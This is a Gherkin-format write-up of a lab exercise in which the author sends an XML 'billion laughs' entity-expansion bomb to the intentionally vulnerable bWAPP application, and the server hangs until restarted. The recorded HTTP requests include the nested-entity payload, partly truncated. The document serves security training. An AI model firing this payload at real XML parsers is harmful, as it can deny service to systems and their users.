# language: en

Feature: DoS XML Bomb
  From system bWAPP
  From the A7 - Missing Functional Level Access Control
  With Low security level

  Background:
    Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
    And I am using Firefox 52.7.3 (64-bit)
    And I am running Burp Suite Community edition v1.7.30
    Given the following
    """
    URL: http://localhost/bWAPP/xmli_2.php
    Message: DoS XML Bomb
    Details:
    - XML/XPath Injection
    - Search movies through an xml search &
    interpreter/parsing function
    Objective: Use the interpreter against to provoke an DoS xml Bomb
    """

  Scenario: DoS XML Bomb
    Given the form search
    Then I request a movie by selecting the genre
      """
      # Request xml_2.php
      GET /bWAPP/xmli_2.php?genre=action&action=search HTTP/1.1
      Host: 192.168.75.128
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://192.168.75.128/bWAPP/xmli_2.php?genre=horror&action=search
      Cookie: security_level=0; PHPSESSID=61bb492e6018a44011b3a6bfcf75eeac
      Connection: close
      Upgrade-Insecure-Requests: 1

      # Response
      | # |  Movie |
      | 1 |  The Matrix |
      | 2 |  Resident Evil |
      | 3 |  Thor |
      | 4 |  X-Men |
      | 5 |  Ghost Rider |
      | 6 |  Underworld |
      """
    Then I do another request
    And I modify it with the xml bomb entity expansion
      """
      # Modified Request xml_2.php
      GET /bWAPP/xmli_2.php?genre=action&action=search HTTP/1.1
      Host: 192.168.75.128
      ...
      ...
      Upgrade-Insecure-Requests: 1
      Content-Length: 880

      <?xml version="1.0" encoding="utf-8"?>
      <!DOCTYPE lolz [
      <!ENTITY lol "lol">
      <!ELEMENT login (#PCDATA)>
      <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
      <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1...
      <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2...
      ...
      ...
      ...
      <reset><login>&lol9;</login><secret>blah</secret></reset>

      # Response
      # ---
      # Time passes and there is no response, a few minutes later, the
      # proxy comes out with some response
      # Burp Suite Community Edition
      # Error
      # Timeout in communication with remote server
      #
      # And i had to restart the server as it wasn't receiving any
      # request
      """
